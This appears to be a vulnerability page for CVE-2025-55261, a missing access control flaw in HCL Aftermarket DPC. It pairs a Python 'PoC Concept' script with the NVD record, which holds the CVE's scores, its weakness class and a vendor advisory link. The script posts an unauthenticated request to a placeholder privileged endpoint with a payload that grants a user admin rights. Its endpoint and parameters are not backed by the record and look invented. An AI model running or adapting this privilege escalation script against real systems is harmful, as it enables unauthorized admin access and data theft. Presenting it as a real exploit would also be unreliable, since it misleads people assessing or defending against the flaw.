CVE-2025-55261

import requests # CVE-2025-55261 PoC Concept # Target: HCL Aftermarket DPC # Vulnerability: Missing Functional Level Access Control TARGET_URL = "http://target-host/api/v1/privileged/action" # Malicious payload attempting to escalate privileges or access restricted data payload = { "userId": "attacker_controlled_id", "role": "admin", "action": "grant_full_access" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/json", # Note: Exploit requires no authentication based on PR:N vector } try: response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Potential Exploit Successful!") print("[+] Server Response:", response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}")

{"cve": {"id": "CVE-2025-55261", "sourceIdentifier": "[email protected]", "published": "2026-03-26T14:16:07.710", "lastModified": "2026-03-26T20:01:57.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Aftermarket DPC is affected by Missing Functional Level Access Control which will allow attacker to escalate his privileges and may compromise the application and may steal and manipulate the data."}, {"lang": "es", "value": "HCL Aftermarket DPC se ve afectado por la falta de control de acceso a nivel funcional, lo que permitirá al atacante escalar sus privilegios y podría comprometer la aplicación, así como robar y manipular los datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "C71E5E64-ED4C-4763-8A74-5F9DDCFD13DA"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}